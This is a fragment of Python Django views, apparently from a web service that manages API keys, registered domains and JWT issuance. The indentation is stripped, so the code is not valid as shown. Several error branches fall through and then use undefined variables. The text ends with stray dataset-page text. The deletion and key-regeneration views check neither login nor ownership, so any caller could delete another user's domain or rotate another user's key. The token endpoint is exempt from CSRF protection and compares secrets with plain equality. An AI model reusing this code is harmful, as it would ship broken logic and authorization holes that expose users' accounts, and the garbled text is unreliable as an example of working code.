if parsed_domain.path[:9] == '127.0.0.1' or parsed_domain.path[:9] == 'localhost':
post_domain = parsed_domain.path
elif parsed_domain.netloc:
post_domain = parsed_domain.netloc
if post_domain[:4] == 'www.':
post_domain = post_domain[4:]
else:
post_domain = parsed_domain.path
# If server can't find a correct URL format
if not post_domain:
messages.add_message(request, messages.ERROR, 'Please write a right url.')
try:
a = ApiKey.objects.get(key=request.POST.get('api_key'))
except ObjectDoesNotExist:
messages.add_message(request, messages.ERROR, 'api key doesn\'t exist.')
# Check if this user already has the same URL
try:
d = Domain.objects.get(domain=post_domain, api_key=a)
except ObjectDoesNotExist:
d = Domain(domain=post_domain, api_key=a)
d.save()
else:
messages.add_message(request, messages.ERROR, 'There is already same domain in your account.')
return redirect('main:user_mypage', request.user.id)
def domain_delete(request):
response_json = {}
if request.is_ajax():
data = json.loads(request.body.decode('utf-8'))
domain_id = data.get('d_id')
try:
domain_instance = Domain.objects.get(id=domain_id)
except ObjectDoesNotExist:
response_json.update({
'status': 'fail'
})
domain_instance.is_removed = True
domain_instance.save()
response_json.update({
'status': 'success'
})
return JsonResponse(response_json)
def secret_key_new(request, key):
a = get_object_or_404(ApiKey, key=key)
a.secret_key = ApiKey.objects.generate_secret()
a.save()
return redirect('main:user_mypage', request.user.id)
@csrf_exempt
def jwt_new(request):
data = json.loads(request.body.decode('utf-8'))
api_key = data.get('api-key')
secret = data.get('secret-key')
exp = data.get('exp')
nbf = data.get('nbf')
if not exp:
exp = datetime.datetime.utcnow() + datetime.timedelta(days=30)
if not nbf:
nbf = datetime.datetime.utcnow()
a = get_object_or_404(ApiKey, key=api_key)
if a.secret_key == secret:
encoded = jwt.encode({
'api-key': api_key,
'exp': exp,
'nbf': nbf
}, secret, algorithm='HS256')
return JsonResponse({'jwt': str(encoded.decode('utf-8'))})
else:
return JsonResponse({'error': 'Not valid secret key.'})
def downloads(request):
return render(request, 'main/pages/downloads.html')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.